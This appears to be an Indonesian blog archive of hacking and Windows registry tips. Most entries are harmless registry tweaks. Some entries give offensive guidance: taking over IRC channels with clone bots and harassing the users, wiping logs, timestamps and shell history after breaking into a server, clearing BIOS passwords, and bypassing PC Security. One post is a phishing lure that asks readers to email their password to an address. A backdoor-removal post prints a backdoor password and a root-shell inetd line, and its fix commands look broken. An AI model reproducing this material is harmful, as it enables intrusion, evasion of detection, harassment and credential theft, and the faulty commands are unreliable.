berikan sang MCB nama / nama-nama dari op-op yang ingin kamu bantai, dan beri-
tahukan program ini server split mana yang akan membuat 'clone' tsb saat
rejoin. Akibat dari Bot ini adalah, target kamu akan terlempar keluar dari
channel (melepas status op). Jika kamu berhasil membunuh semua op di channel
target kamu, maka kamu akan menjadi satu-satunya op di channel itu. Tak ada
yang lebih memuaskan daripada menyaksikan 'nick kill messages' dari op yang
kamu bunuh.

Ada beberapa hal yang kamu perlu perhatikan sebelum kamu mencoba untuk meng-
takeover sebuah channel di IRC. Yang paling jelas dan penting adalah menge-
tahui siapa-siapa yang akan kamu serang. Amati channel ybs selama beberapa
menit, catat siapa yang merupakan op asli dan siapa yang merupakan bot, dan
juga siapa diantara mereka yang melakukan 'deop splitters'. Mereka-mereka
inilah yang perlu kamu targetkan untuk dibunuh oleh MCB. Hal yang juga perlu
diperhatikan (dan kalian yang kebetulan juga merupakan ChanOp di sebuah chan
ini adalah pertahanan yang bisa kamu andalkan) adalah op-op yang secara otomatis
mengganti nick mereka saat mereka mendeteksi sebuah 'split'. Jika hal ini
terjadi maka MCB kamu tidak akan berfungsi seperti yang diinginkan.
Cara yang bisa dimanfaatkan adalah dengan memonitor dua sisi split. Jadi de-
ngan menggunakan satu MCB di server yang terpisah, dan tetap berada di channel
yang masih terhubung ke net.

7. Hal-hal asyik yang bisa dilakukan.
Sekali kamu berhasil meng-takeover sebuah channel, tentu saja banyak yang bisa
kamu lakukan. Biar bagaimanapun, biarlah saya bagi pengalaman mengenai beberapa
ide cemerlang yang dijamin akan menjengkelkan musuh-musuhmu di irc:
- Ledek (mantan) ops di channel tsb. Setelah kena 'kick' tentu mereka akan kem-
bali dan mengutuk dan menyumpah kamu. Mungkin seperti "get a life, loser" etc.
ingatlah, jangan diambil terlalu personal.Ingat juga bahwa merekalah yang perlu
'get a life' sebab merekalah biangnya, toh mereka pula yang tadinya punya op.
lanjutkanlah ledekanmu, dan jika mereka menjadi benar-benar kasar, kick saja.
Saat mereka kembali, bisa juga kamu bumbui dengan "Now, now. I am in full con-
trol of this channel and will not tolerate such language ... heheheh "
- word ban. di LICE bisa kamu pilih kata/kalimat yang akan mengakibatkan user di-
kick tiapkali dia menyebut kata yang di-ban. gunakan teknik ini di #teensex
atau #netsex, dan tiap kali ada yang menyebut "sex" atau "fuck" etc.
- satu lagi, adalah dengan memoderator channel. Yang bisa dilakukan ialah dengan
/mode +m untuk mengakibatkan tak ada seorangpun yang bisa berbicara. jadi
kamulah satu satunya yang bisa bicara di channel ini. Berguna jika kamu ingin
menyampaikan pesan/pendapat tanpa interupsi.
- dll. dll.

semoga ini menjadi bahan referensi untuk kalian yang berkecimpung di dunia
IRC. Gunakan pengetahuan disini untuk melindungi kamu sendiri... dll dll...
heheheh ...

Meng-"indonesia"-kan beberapa setting Windows*

2008-06-09T04:32:00.001-07:00

Pernah membayangkan punya Windows berbahasa Indonesia ? Kalau pernah, lupakan aja karena tidak akan pernah ada MS Windows berbahasa Indonesia. Tapi kalau yang Anda inginkan adalah tulisan berbahasa Indonesia pada beberapa setting Windows, Anda bisa melakukannya.

Coba buka Windows Explorer. Dari menu View, pilih Folder Options. Pindah ke tab View. Akan muncul tampilan seperti gambar di atas.

Perhatikan bahwa semua setting tersebut menggunakan bahasa Inggris, misalnya Allow all uppercase names, hide file extensions for known file types, dan lain-lain. Untuk mengganti tulisan tersebut menjadi teks berbahasa Indonesia caranya adalah sebagai berikut :

Dari Start Menu, pilih Run.
Ketikkan regedit, klik OK.
Pindah ke key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\explorer\Advanced\Folder.
Back up file registry tersebut, supaya kalau ada kesalahan Anda masih mengembalikan seperti keadaan semula.
Cari string "Text" (tanpa tanda petik) yang terletak pada panel sebelah kanan untuk masing-masing subkey. Lalu ganti isinya (atau Data-nya).

Kalau masih bingung, di bawah ini kami berikan contoh lengkapnya :

Di bawah key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
explorer\Advanced\Folder terdapat beberapa subkey, diantaranya adalah ClassicViewState, DontPrettyPath, Hidden, HideFileExt, dan seterusnya.

Sekarang pindah ke subkey HideFileExt. Perhatikan pada panel di sebelah kanan, terdapat Name=Text dan Data=Hide file extensions for known file types. Untuk mengganti menjadi bahasa Indonesia klik dua kali pada tulisan Text. Isikan dengan (misalnya) "Sembunyikan ekstensi file untuk type file yang diketahui" (tanpa tanda petik).

Untuk setting yang lainnya caranya sama dengan di atas. Pertama pindah ke salah satu subkey. Klik dua kali pada Text dan ganti tulisan berbahasa Inggris tersebut dengan tulisan Anda. Selamat mencoba !!

Masih bingung dengan tips di atas ? Kirim pertanyaan ke Forum Diskusi atau help@klik-kanan.com.

Menghilangkan Password Bios

2008-06-09T04:24:00.000-07:00

Tips ini saya dapatkan dari seorang teman beberapa tahun yang lalu. Mungkin ini bisa membantu rekans yang membutuhkan. Masuk ke mode DOS setelah muncul prompt DOS c:\> ketikkan DEBUG seperti ini

c:\>DEBUG

Untuk selanjutnya ketikkan

o 70 2e
o 71 ff
Q

Pada layar monitor akan terlihat seperti dibawah ini c:\>DEBUG

-o 70 2e
-o 71 ff
-Q
setelah mengetikkan Q anda akan keluar dari debug yang menandakan anda sudah selesai. Selanjutnya restart komputer anda, tekan DEL dan SELAMAT anda sudah bisa masuk ke BIOS.

Menghapus Jejak di Server

2008-06-09T04:22:00.001-07:00

Artikel ini merupakan beberapa tips dari penulis tetang cara mengapus jejak di server. Seringkali kali kita bingung apa yang dilakukan oleh kita jika sudah masuk ke server target, atau menguasai server target hanya dalam hitungan menit di karenakan jejak kita dicium oleh admin walaupun kita sudah buat accaunt baru.

Berikut ini adalah beberapa tips :
MENGHAPUS LOG FILE
Log file ibarat tempat mencatat segala sesuatu yang dilakukan di server, jadi apapun kegiatan kita diserver akan selalu dicatat sampai kita keluar dari sistem. Biasanya penyusup bisa ketahuan dari log file ini. Untuk sistem UNIK, cara mudah untuk mengetahui dimana log file ini ketikkan /etc/syslog.conf. Perintah itu akan menunjukkan di mana lokasi file log nya. Biasanya log file disimpan di /usr/adm, /var/adm atau /var/log. Beberapa isi log file antara lain acct, lastlog dan lain lain. Ada beberapa program untuk menghapus log file antara lain zap, wzap dan lainnya.

MENGUBAH WAKTU DAN TANGGAL AKSES
Ini kelihatan sepele tapi bagi administrator yang jeli (gimana sie rasanya jd administrator)
Kecurigaan tentu saja muncul jika melihat login terakhir dia dengan yang tercatat sekarang di server. Untuk itu anda perlu mengubah waktu akses kita sebagai salah satu syarat kita tetap dapat akses mesin itu. Contoh perintahnya

touch |?ac| |waktu| | nama_file|

untuk waktu, contoh penulisannya 1223100298 artinya bulan 12 tanggal 23 jam 10 menit 00 tahun 98.

MENGHAPUS HISTORY
Menghapus file-file di history juga sangat penting (menurut saya), file history biasanya berada di .bash_history atau .history.

Silahkan kalau ada temen2 yang mau menambahkan, mungkin para admin yang sudah biasa menyusuri penyusup yg agak nakal. Mungkin yang perlu diperhatikan lagi adalah ? ingat-ingat apa saja yang tadi anda lakukan saat masuk server? kenapa? Karena salah sedikit aja, akses anda akan hilang. Misalnya anda membuat user baru. Mungkin anda ingin mengakali server dengan menghapus user lain selain su dengan user baru tapi menggunakan nama yang sama, menurut saya itu kesalahan besar. Mungkin itu akan berhasil sebelum yang punya account itu login dan mengetahui dia tidak bisa login, sampai disitulah hidup anda diserver itu. Backdoor? Terserah anda, ini artikel buat menghapus jejak kok bukan membuat backdoor he..he...!

Thank to herma (my angel) ?you are my inspiration?, ketut yang udah sukses dan aku yang lagi pusing gak tamat-tamat kuliahnya. Brokencode #binushacker good job. Temen temen di #balihack yg rajin nongkrong di channel. Kenapa ya, ada beberapa dosen yang seneng mahasiswanya gak lulus kuliah...pusing

Menghapus Icon Recycle Bin dan My Documents dari Desktop

2008-06-09T04:21:00.000-07:00

========================================================

========================================================
February, 11, 2001

by
Chandraleka
Chandrk@hotmail.com
http://come.to/digitalworks
http://www.geocities.com/hchandraleka

Master is only one. I cannot imagine if master more than one.

Ada beberapa Icon pada desktop yang apabila kita klik kanan pada Icon - Icon tersebut kita
tidak dapat menghapusnya. Icon - icon tersebut yaitu My Computer, My Documents, dan Recycle
Bin. Dengan tip ini pembaca dapat menghapus dua icon tersebut yaitu My Documents dan
Recycle Bin.
· Buka registry dengan Regedit. Cari key berikut :
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace]
· Sebelumnya kita akan membackup key NameSpace tersebut. Caranya yaitu : sorot key
NameSpace, klik menu Registry | Export Registry File … Ketikan nama filenya, misalnya
NameSpace. Tekan tombol Save.
· Sorot key {450d8fba-ad25-11d0-98a8-0800361b1103}. Key ini adalah key untuk icon
My Documents. Hapuslah dan jangan khawatir karena kita telah membackupnya.
· Sorot key {645FF040-5081-101B-9F08-00AA002F954E}. Key ini adalah key untuk Icon
Recycle Bin. Hapuslah dan jangan khawatir karena kita telah membackupnya.
· Restart PC dan kita lihat icon My Documents dan Recycle Bin hilang dari desktop.
· Untuk merestore-nya : klik kanan file NameSpace.reg yang kita buat tadi dan klik Merge.
Kemudian Restart PC. That's all.

-----^v^-----

Removing Backdoor

2008-06-09T04:20:00.000-07:00

Wadowww…kita punya shell ada backdoornya . Nakal banget yakz orang yang bikin backdoor di shell kita, palagi kalo shellnya beli ( meskipun pake cc orang.. ). So pasti rasanya kita strezzZZZ ( koq malah ngorok sehh ).

Tenang & enjoy aja prend, karena itu semua adalah hal yang wajar di dunia cyber. Disini saya mo kaseh sedikit solusinya..ciee koq malah sok jagoan sehh.
Saya coba mengulas bagaimana cara meremove backdoor,tetapi sebelumnya mungkin perlu kita ketahui dahulu type - type backdoor yg sering digunakan:

1. /bin/login backdoor
2. sshd backdoor
3. /etc/passwd backdoor
4. Port backdoor

/bin/login backdoor
SSsstt…teliti dulu ada Trojannya or gak. Kalo ada bisa gawat tuch ?, untuk melihat bahwa /bin/login didalam box anda telah tertanam trojan gunakan command
# /bin/login dan hasilnya akan nampak:
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
getenv
execve
perror
system
__deregister_frame_info
strcmp
exit
_IO_stdin_used
__libc_start_main
__register_frame_info
GLIBC_2.0
PTRh
DISPLAY
/bin/.login >> Ini dimana /bin/login yang asli berada
w3ar3hack3rz >> Nah ini dia backdoor passwordnya
/bin/sh
Untuk menghilangkan /bin/login backdoor, ketik command berikut:
rm /bin/login
mv /bin/login

sshd backdoor
dasarnya, sshd process berjalan di background, dan bilamana kamu
melakukan command ps -aux, dan semua proses di background akan nampak,
namun sedikit sekali ssh backdoor akan kelihatan bila di ps, untuk
mengatasinya gunakan salah satu trik dengan command:
tail -5 /etc/rc.d/rc.sysinit
# Now that we have all of our basic modules loaded and the kernel going,
# let's dump the syslog ring somewhere so we can find it later
dmesg > /var/log/dmesg
/usr/info/.t0rn/sharsed >> menunjukkan ssh backdoor
Untuk menghapusnya, del /usr/info/.t0rn/sharsed dan
rm /usr/info/.t0rn/sharsed;killall -9 sharsed

/etc/passwd backdoor
Backdoor ini biasa digunakan oleh seorang hacker untuk melakukan login dengan su atau dengan kata lainyna root
dan backdoor ini sebernarnya sangat mudah untuk dideteksi.
gunakan command:
cat /etc/shadow
/etc/passwd yang asli akan kelihatan seperti berikut:
operator:*:11164:0:99999:7:::
games:*:11164:0:99999:7:::
dan bila /etc/passwd telah terbackdoor akan nampak seperti berikut:
operator:$1$Qv0h4mTr$0dKXLXYIy74LH93tCTayU1:11179:0:99999:7:-1:-1:134537332
untuk menghilangkan, edit account list pada /etc/passwd dan kembalikan
pada bentuk yang pertama sebelum terbackdoor

Port backdoor
para intruder biasanya menaruh port backdoor seperti berikut:
1008 stream tcp nowait root /bin/sh sh -i didalam /etc/inetd.conf
hilangkan dengan delete/remove /etc/inetd.conf dan restart kembali
inetd dengan:
/etc/rc.d/init.d/inet restart

Sekian dulu dari saya, mungkin tutorial ini sudah usang sehingga rekan – rekan sudah ngerasa bosan dengan hal tersebut. Karena apalah arti seorang newbie seperti saya, banyak rekan – rekan yang lebih jago. Maju terus #balihack. Salam maniez buat rekan – rekan semua.

Mengganti Registered Owner dan Organization

2008-06-09T04:19:00.002-07:00

Ketika Anda mengklik kanan My Computer maka Anda akan melihat kalimat Registered to .... Jika Anda keliru menuliskan nama pemilik dan organisasinya, Anda masih bisa untuk menggantinya, yaitu dengan cara masuk ke :
key : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion
lalu ganti nama RegisteredOwner, RegisteredOrganization yang terletak pada panel sebelah kanan. Cara menggantinya yaitu dengan mengklik kanan Value Name tersebut.

Mengganti icon pada start menu

2008-06-09T04:19:00.001-07:00

Icon pada Start Menu yang itu-itu saja tentunya bikin kita cepat bosan. Walaupun Microsoft tidak pernah merelease tips & triknya, Anda bisa mengganti icon yang ada pada Start Menu tersebut. Untuk itu ikuti langkah-langkah di bawah ini :

Pertama cari key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\explorer\Shell Icons\.
Pada panel sebelah kanan, buat string value baru. Caranya klik kanan, lalu pilih New - String Value. Beri nama string value tersebut sesuai dengan icon yang akan Anda ganti seperti tercantum pada tabel di bawah ini.
Klik 2x pada string baru tersebut dan isi dengan path atau letak icon yang akan Anda gunakan. Misalnya icon Anda terletak di C:\My Documents maka isi dengan "C:\My Documents\icon1.ico".

Nama String Value Keterangan
19 Programs
43 Favorites
20 Documents
21 Settings
22 Find
23 Help
24 Run
44 Log Off
27 Shutdown

Mengganti Icon - Icon, Nama Dan Tool Tip Folder Khusus

2008-06-09T04:18:00.001-07:00

======================================================

======================================================
November, 02, 2001
by Chandraleka
Depok
Chandrk@hotmail.com
http://come.to/digitalworks

Selanjutnya kita akan bermain dengan folder - folder khusus, yaitu folder - folder yang ditandai
dengan icon khusus yang berbeda dengan lainnya. Folder - folder ini contohnya adalah My
Computer, My Documents, Recycle Bin, Control Panel, Printers, dll. Ada sebagian folder - folder
khusus tersebut yang dapat diganti icon dan namanya dengan mudah, yaitu dengan mengklik kanan
pada icon tersebut. Tetapi jumlahnya sedikit. Dengan trik ini pembaca dapat mengetahui bagaimana
mengganti gambar icon, nama, dan tool tip seluruh folder khusus tersebut, termasuk yang tidak
dapat dilakukan dengan mengklik kanan mouse.

Mengganti Icon Folder Khusus
-----------------------------
Contoh yang akan digunakan dalam hal ini adalah folder My Computer. Untuk mengganti icon My
Computer ini, buka registry Windows dengan menggunakan Regedit dan bukalah key berikut ini :

HKEY_Current_User\software\classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E} \defaulticon

Bila key tersebut belum ada, pembaca dapat membuat key baru dengan memilih menu Edit > New > Key.
Selanjutnya pada string value "default" yang telah ada isikan dengan nama direktori dan icon
favorit yang pembaca miliki. Misalnya C:\Myicon.ico. Dengan demikian isi dari string value
default adalah "C:\Myicon.ico" .
Selanjutnya coba jalankan Windows Explorer dan pembaca akan melihat icon My Computer yang telah
berubah. Mudah khan…

Icon - icon lainnya dapat diganti dengan cara yang sama, hanya saja pembaca perlu menyesuaikan
nama icon yang akan diubah dengan key pada registry Windows. Pembaca dapat mengacu pada tabel
berikut ini.

Tabel 1. Tabel key registry untuk mengganti icon folder khusus.
------------------------------------------------------------------
Nama Icon Key Registry String Value
My Computer hkcu\software\classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E}\defaulticon default
Network Neighborhood hkcu\software\classes\clsid\{208D2C60-3AEA-1069-A2D7-08002B30309D}\defaulticon default
Recycle bin default hkcu\software\classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E}\defaulticon default
Recycle bin full hkcu\software\classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E}\defaulticon full
Recycle bin empty hkcu\software\classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E}\defaulticon empty
My Documents hkcu\software\classes\clsid\{450D8FBA-AD25-11D0-98A8-0800361B1103}\defaulticon default
Internet Explorer hkcu\software\classes\clsid\{871C5380-42A0-1069-A2EA-08002B30309D}\defaulticon default
Control Panel hkcu\software\classes\clsid\{21EC2020-3AEA-1069-A2DD-08002B30309D}\defaulticon default
Printers hkcu\software\classes\clsid\{2227A280-3AEA-1069-A2DE-08002B30309D\defaulticon default
Dial-Up Networking hkcu\software\classes\clsid\{992CFFA0-F557-101A-88EC-00DD010CCC48}\defaulticon default
Web Folders hkcu\software\classes\clsid\{BDEADF00-C265-11D0-BCED-00A0C90AB50F}\defaulticon default
Scheduled Tasks hkcu\software\classes\clsid\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\defaulticon default

Keterangan :
hkcu = HKEY_Current_User

Dengan mengacu pada tabel di atas maka pembaca dapat mengganti icon - icon pada folder - folder
khusus yang semula tidak mungkin untuk diganti.

Mengganti Nama Folder Khusus
-----------------------------
Sama halnya dengan mengganti icon pada folder khusus, mengganti nama pada folder - folder khusus
pun ada yang mudah yaitu dengan mengklik kanan pada folder tersebut kemudian memilih menu Rename.
Tetapi pada sebagian icon yang lain tidak dapat dilakukan dengan cara tersebut. Ia hanya dapat
dilakukan dengan cara diluar kebiasaan yang ada. Yaitu dengan cara berikut ini.

Contoh merupakan hal yang paling baik untuk menerangkan masalah ini. Dalam hal ini penulis
menggunakan contoh folder Recycle bin, salah satu folder yang tidak dapat diganti namanya dengan
menggunakan cara - cara biasa yaitu dengan klik kanan pada folder tersebut. Untuk mengganti
namanya pembaca perlu menjalankan Regedit dengan memilih menu Start > Run. Dan pada kotak dialog
yang ditampilkan ketikkan "Regedit". Selanjutnya buka key berikut ini :
Hkcu\software\ classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E}

Bila key tersebut belum ada, pembaca perlu membuat key baru dengan memilih menu Edit > New >
Key, dan beri nama dengan nama key yang belum ada. Langkah selanjutnya pada string value default
isikan nama yang baru untuk Recycle Bin. Misalnya isikan "Tempat Sampah". Akhirnya buka Windows
Explorer dan nama Recycle bin telah berganti menjadi Tempat Sampah.

Cara yang sama juga berlaku untuk mengganti nama folder - folder khusus yang lainnya. Tentu saja
pembaca perlu memperhatikan nama foldernya dengan key registry yang ditunjukkan pada tabel di
bawah ini.

Tabel 2. Tabel key registry untuk mengganti nama folder khusus
----------------------------------------------------------------
Nama Icon Key Registry String Value
My Computer hkcu\software\classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E} default
Network Neighborhood hkcu\software\classes\clsid\{208D2C60-3AEA-1069-A2D7-08002B30309D} default
Recycle Bin hkcu\software\classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E} default
My Documents hkcu\software\classes\clsid\{450D8FBA-AD25-11D0-98A8-0800361B1103} default
Internet Explorer hkcu\software\classes\clsid\{871C5380-42A0-1069-A2EA-08002B30309D} default
Control Panel hkcu\software\classes\clsid\{21EC2020-3AEA-1069-A2DD-08002B30309D} default
Printers hkcu\software\classes\clsid\{2227A280-3AEA-1069-A2DE-08002B30309D default
Dial-Up Networking hkcu\software\classes\clsid\{992CFFA0-F557-101A-88EC-00DD010CCC48} default
Web Folders hkcu\software\classes\clsid\{BDEADF00-C265-11D0-BCED-00A0C90AB50F} default
Scheduled Tasks hkcu\software\classes\clsid\{D6277990-4C6A-11CF-8D87-00AA0060F5BF} default

Keterangan : hkcu = HKEY_Current_User

Akhirnya dengan menggunakan tabel di atas pembaca dapat mengganti nama pada folder - folder
khusus, cukup dengan mengisikan tulisan pada string value default berdasar tabel di atas. Folder
- folder yang tidak dapat diganti namanyya sekarang dapat diganti.

Gambar
Windows Explorer dengan icon dan nama baru untuk folder khusus

Mengganti Tooltip Folder Khusus
Yang dimaksud dengan tooltip yaitu tulisan - tulisan yang timbul pada saat pointer mouse
berhenti di atasnya. Tooltip ini biasanya berisi gambaran dari folder atau tip - tip tertentu,
dan isinya ringkas tidak seperti isi file Help pada suatu aplikasi. Berikut ini akan penulis
jelaskan bagaimana mengganti tooltip salah satu dari folder - folder khusus yaitu folder My
computer.
Pembaca perlu menjalankan Regedit dan kemudian membuka key berikut ini :

HKEY_Current_User\clsid\{20D04FE0-3AEA-1069-A2D8-08002B30309D}

Pada string value InfoTip terdapat data berupa tulisan "Displays the contents of your computer" .
Gantilah tulisan tersebut dengan tulisan yang menurut pembaca menarik.
Untuk melihat hasilnya, minimize - lah semua aplikasi dan gerakkan pointer mouse ke atas My
Computer, maka akan terlihat tooltip yang telah pembaca isikan.

Cara yang sama juga dapat diterapkan untuk mengganti tooltip pada folder - folder khusus yang
lainnya. Gunakan tabel berikut ini untuk mengetahui key registrynya.

Tabel 3. Tabel key registry untuk mengganti tooltip folder khusus
--------------------------------------------------------------------
Nama Icon Key Registry String Value
My Computer Hkcr\clsid\{20D04FE0-3AEA-1069-A2D8-08002B30309D} Tooltip
Network Neighborhood Hkcr\clsid\{208D2C60-3AEA-1069-A2D7-08002B30309D} Tooltip
Recycle Bin Hkcr\clsid\{645FF040-5081-101B-9F08-00AA002F954E} Tooltip
My Documents Hkcr\clsid\{450D8FBA-AD25-11D0-98A8-0800361B1103} Tooltip
Internet Explorer Hkcr\clsid\{871C5380-42A0-1069-A2EA-08002B30309D} Tooltip
Control Panel Hkcr\clsid\{21EC2020-3AEA-1069-A2DD-08002B30309D} Tooltip
Printers Hkcr\clsid\{2227A280-3AEA-1069-A2DE-08002B30309D} Tooltip
The Internet Hkcr\clsid\{3DC7A020-0ACD-11CF-A9BB-00AA004AE837} Tooltip
Briefcase Hkcr\clsid\{85BBD920-42A0-1069-A2E4-08002B30309D} Tooltip
Dial-Up Networking Hkcr\clsid\{992CFFA0-F557-101A-88EC-00DD010CCC48} Tooltip
Web Folders Hkcr\clsid\{BDEADF00-C265-11D0-BCED-00A0C90AB50F} Tooltip
Scheduled Tasks Hkcr\clsid\{D6277990-4C6A-11CF-8D87-00AA0060F5BF} Tooltip

Keterangan : Hkcr = HKEY_Classes_root

Ahirnya penulis ucapkan selamat mencoba…

-----eoa

mengetahui password orang lain

2008-06-09T04:17:00.001-07:00

Comment : ANDA PINGIN MENGETAHUI PASSWORD TEMEN ANDA ATAU PASANGAN ANDA / MUSUH ANDA ?
ADA CARA MUDAH UNTUK MENDAPATKANNYA TUNGGU BEBERAPA HARI CARANYA : ANDA HARUS MEMPERGUNA
EMAIL ANDA YANG PERNAH ANDA KIRIM KE EMAILNYA ( EMAIL ANDA ). SETELAH ITU KIRIM EMAIL
MELALUI EMAIL ANDA KE cracks_pass@yahoo.com atau cracks_pass@hotmail.com SESUAI DENGAN
EMAILNYA. dengan subjeck " password " isi sebelum mengirim-> " email musuh anda " ,
dibawahnya isi " password email anda " UNTUK MEMASTIKAN SERVER YANG DI KIRIM MERESPON

Menembus Proteksi PC Security TM

2008-06-09T04:16:00.001-07:00

Kalau kamu penggemar software-software proteksi buat windows, kamu pasti kenal dengan software yang satu ini. PC Security adalah software proteksi untuk file-file, sistem, boot dan lain-lain yang dilengkapi dengan fiture-fiture proteksi yang menarik. Untuk dapat masuk dan merubah setting proteksinya, kamu harus ident sebagai administrator PC security dan untuk ini akan dimintai password. Agar kamu bisa login tanpa melewati password, caranya cari file yang namanya sdeamon.exe dan winwd.exe yang merupakan file bawaan PC Security TM, file ini dihidden dari windows, jadi masuk lewat DOS. Biasanya letaknya di direktori c:\windows atau c:\windows\system. Delete kedua file ini dan kamu akan bisa masuk ke PC Security TM dengan mudah dan merubah settingnya tanpa dimintai password. Selamat mencoba ....

Mencegah perubahan setting Printer

2008-06-09T04:13:00.001-07:00

Jika Anda meng-enable setting ini, maka orang lain tidak dapat mengganti setting pada Control Panel - Printer.
Key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer
Value Name: NoPrinters
Data Type: DWORD Value
Data: (0 = disabled, 1 = enabled)

Mencegah perubahan setting Password

2008-06-09T04:12:00.001-07:00

Jika Anda meng-enable setting ini, maka orang lain tidak dapat mengganti setting pada Control Panel - Password. Dengan kata lain orang lain tidak dapat mengganti password (jika komputer Anda memakai password Windows).
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System
Value Name: NoSecCPL
Data Type: DWORD Value
Data: (0 = disabled, 1 = enabled)

Mencegah perubahan setting Network

2008-06-09T04:11:00.000-07:00

Jika Anda meng-enable setting ini, maka orang lain tidak dapat mengganti setting pada Control Panel - Network.
Key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Network
Value Name: NoNetSetup
Data Type: DWORD Value
Data: (0 = disabled, 1 = enabled)

(Bila belum terdapat key Network, cara membuatnya sama seperti tips setting Display di atas)

Mencegah perintah Shut Down

2008-06-09T04:10:00.002-07:00

Setting berikut akan mencegah seseorang untuk mematikan komputer Anda. Hal ini berguna jika misalnya Anda meninggalkan komputer untuk beberapa saat dan Anda khawatir ada orang lain yang akan men-Shut Down komputer Anda.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer
Value Name: NoClose
Data Type : DWORD Value
Data: (0 = shutdown enabled, 1 = shutdown disabled)

Mencegah penggantian setting Display Properties

2008-06-09T04:10:00.001-07:00

Anda dapat melakukan Setting display dari Control Panel - Display atau melalui klik kanan pada desktop, lalu pilih Properties.
Dengan setting di bawah ini orang lain tidak dapat mengganti setting pada Display tersebut.
Key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System
Value Name: NoDispCPL
Data Type: DWORD Value
Data: (0 = disabled, 1 = enabled/mencegah penggantian)

Mencegah akses ke Control Panel > Passwords

2008-06-09T04:08:00.000-07:00

Kalau Anda pengen mengamankan komputer Anda, mencegah seseorang mengganti password Windows Anda, gunakan tips berikut ini.

Key : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
Value Name : NoSecCPL
Data Type : DWORD Value
Data : (0 = disabled, 1 = enabled)

Menampilkan log on message

2008-06-09T04:05:00.000-07:00

Kalau komputer Anda termasuk komputer publik, maksudnya komputer yang biasa dipake beramai-ramai, Anda dapat menambahkan log on message. Sehingga setiap pemakai komputer akan melihat message atau tulisan tersebut, yang berisi misalnya peringatan atau yang lainnya.

Caranya cukup mudah, pertama masuk ke registry editor lalu cari key di bawah ini :

Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Winlogon
Value Name - LegalNoticeCaption (untuk captionnya)
- LegalNoticeText (untuk isinya)

Data Type String Value
Data Isi dengan text yang Anda inginkan

Menambahkan Logo dan Informasi Pada Kotak Dialog Sistem Properties

2008-06-09T04:01:00.001-07:00

==================================================================
Menambahkan Logo dan Informasi Pada Kotak Dialog Sistem Properties
==================================================================
February, 11, 2001

by : uwie lumut

Master is only one. I cannot imagine if master more than one.

Coba pembaca buka Control Panel dan pilih icon System. Pembaca akan dihadapkan pada tampilan
System Properties. Pada tab General pembaca mungkin tidak mendapati tombol 'Support
Information' dan tidak ada gambar logo di bawah gambar komputer.
Dengan trik berikut ini pembaca dapat menambahkan Support Information dan logo. Stay tune with
this article.
· Buka Notepad dan ketikkan teks di bawah ini :

[General]
Manufacturer=The Cakrabirawa inc.
Model=Model 2001
[Support Information]
Line1=I believe there is only one Master
Line2=Master is only the One
Line3=I cannot imagine if master more than One
Line4=Master of universe must be the One

· Simpan dengan nama OEMINFO.INI ke direktori C:\Windows\System untuk Windows 9x
· Atau ke direktori C:\Winnt\System32 untuk Windows NT
· Untuk logonya, pembaca membutuhkan file gambar bertipe bitmap dengan ukuran
160 x 120 pixels dan disimpan ke direktori system diatas dengan nama OEMLOGO.BMP.
· Sekarang coba lagi buka System Propertiesnya dengan menekan tombol Windows+Break.

-----^v^-----

Mempercepat akses defrag dan scandisk

2008-06-09T03:56:00.000-07:00

Untuk mempertahankan supaya kinerja Windows tetep OK, tentunya kita harus merawatnya dengan baik. Salah satu yang harus Anda lakukan adalah defragment dan scandisk.

Tips berikut ini akan menambahkan context menu pada drive. Jadi saat Anda membuka windows explorer dan mengklik kanan pada drive maka akan muncul menu "Defrag drive ini" dan "Scandisk drive ini".

Cari key HKEY_CLASSES_ROOT\Drive\Shell.
Buat key baru, beri nama Defrag.
Pd panel sebelah kanan, pada bagian (default) isi dengan "&Defragment Drive Ini" (ketik tanpa tanda petik).
Buat subkey baru "di bawah" Defrag, dan beri nama dengan Command.
Pd panel sebelah kanan, pada bagian (default) isi dengan "defrag.exe "%1" /noprompt" (ketik tanpa tanda petik).

Untuk membuat context menu Scandisk caranya seperti di atas, Anda hanya perlu mengganti tiga kata yang berwarna biru di atas dengan Scandisk, &Scandisk Drive Ini, dan scandskw.exe /n.

Membuat shortcut ke berbagai folder system

2008-06-07T04:51:00.001-07:00

Membuat shortcut ke berbagai folder system

Folder system yang dimaksud di sini adalah folder Printers, Control Panel, My Computer, dll. Nah, kalau Anda sering mengakses folder-folder tersebut alangkah lebih baiknya kalau Anda membuat shortcutnya yang bisa Anda letakkan pada Desktop atau pun pada Start Menu. Contohnya untuk membuat shortcut Control Panel pada Desktop :

Klik kanan pada Desktop.
Pilih New - Folder.
Beri nama folder tersebut dengan Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}.

Anda bisa mengganti nama folder tersebut sesuai dengan shortcut yang ingin Anda buat. Lihat tabel di bawah ini :
Folder Nama
Dial Up Networking Dial-Up Networking.{992CFFA0-F557-101A-88EC-00DD010CCC48}
Printers Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}
Control Panel Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}
My Computer My Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Network Neighborhood Network Neighborhood.{208D2C60-3AEA-1069-A2D7-08002B30309D}
Recycle Bin Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}
